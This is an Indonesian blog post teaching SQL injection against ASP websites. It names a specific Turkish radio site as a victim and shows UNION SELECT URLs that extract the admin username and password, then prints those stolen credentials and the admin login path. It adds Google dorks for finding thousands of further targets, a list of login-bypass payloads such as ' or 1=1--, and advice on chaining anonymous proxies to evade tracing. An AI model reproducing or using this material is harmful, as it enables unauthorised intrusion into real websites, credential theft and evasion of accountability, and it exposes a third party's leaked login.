tutorial ini untuk belajar menggunakan sql injection, tetapi tidak 100% ampuh,
coz sudah banyak website yang sudah mengamankan systemnya.
Untuk mencari targetnya, silahkan menggunakan keyword yang tepat ...
ex : inurl:/devami.asp?id= geri
Korban yang saya dapatkan adalah :
http://www.radyopinarim.com/haber1/devami.asp?id=1
Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini
Microsoft OLE DB Provider for ODBC Drivers hata '80040e14'
[Microsoft][ODBC Microsoft Access Sürücüsü] 'id=' sorgu
ifadesi içindeki Sözdizimi hatasý (eksik iþleç)
/haber1/devami.asp, satýr 8
Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs
ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan
-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
Yang saya dapatkan usernamenya adalah Kadrius
dan untuk mencari passwordnya
:
-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
passwordnya adalah 19901990
Untuk login sebagai admin anda tinggal balik kehalaman
/admin/kontrol.asp
---------------step by steep-------------------
SEARCH:
adminlogin.asp
login.asp
dengan dua kata pencarian ini kamu bisa menemukan banyak target untuk dipilih...
mencari mana yang mempunyai kelemahan
INJECTION STRINGS:HOW ?
disini ini yang paling mudah!! sangat simple lo.
pada bagian login cukup masukkan yang seperti ini:
user:admin (ngga perlu harus admin)
pass:' or 1=1--
atau
user:' or 1=1--
admin:' or 1=1--
beberapa situs kadang hanya mengharuskan memasukkan passnya aja
password:' or 1=1--
injeksi yg paling mudah menggunakan ' or 1=1--
combo example:
yang paling penting mencari target operasinya ketikkan kata kunci dibawah ini
di goggle
inurl:login.asp
index of:/admin/login.asp
seperti ini: index of login.asp
hasilnya:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 target yang memungkinkan untuk dicoba :D
dalam melakukan aksi kamu, lebih baik menggunakan proxy agar ISP tidak memblok
kamu, sumpah beneren pisan!!
warnet yang dulu iBNuX pake tuk nyerang didatangin ISPnya karena dapat pengaduan
dari yg punya websitenya :D
jadi cari aja proxy gratisan yang bisa anonymously jadi kamu ngga akan ketahuan
datangnya darimana, lebih bagus lagi kalo menggunakan proxy chain
akan lebih susah dilacak(trace) contoh : iBNuX
---> proxy1(jerman)--->
proxy2(jepang)--->proxy3(newyork)--->target
sebaiknya dalam melakukan penyerangan selalu menggunakan proxy anonymous
gunakan variasi injection dibawah ini dalam membobolnya
:D
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
cara yg paling penting adalah membuat error dalam
script yg ada di page maupun dalam melakukan query, karena dr situ kita bisa
lihat info yg penting.
carilah error page sebanyak-banyaknya sebagaimana para hacker mencari info di
tonk sampah.
buat pengetahuan, iBNuX ngga
bertanggung jawab kalo anda menggunakannya untuk kejahatan, tapi kalo berhasil
bagi-bagi yah :))
Langganan:
Posting Komentar (Atom)




Tidak ada komentar:
Posting Komentar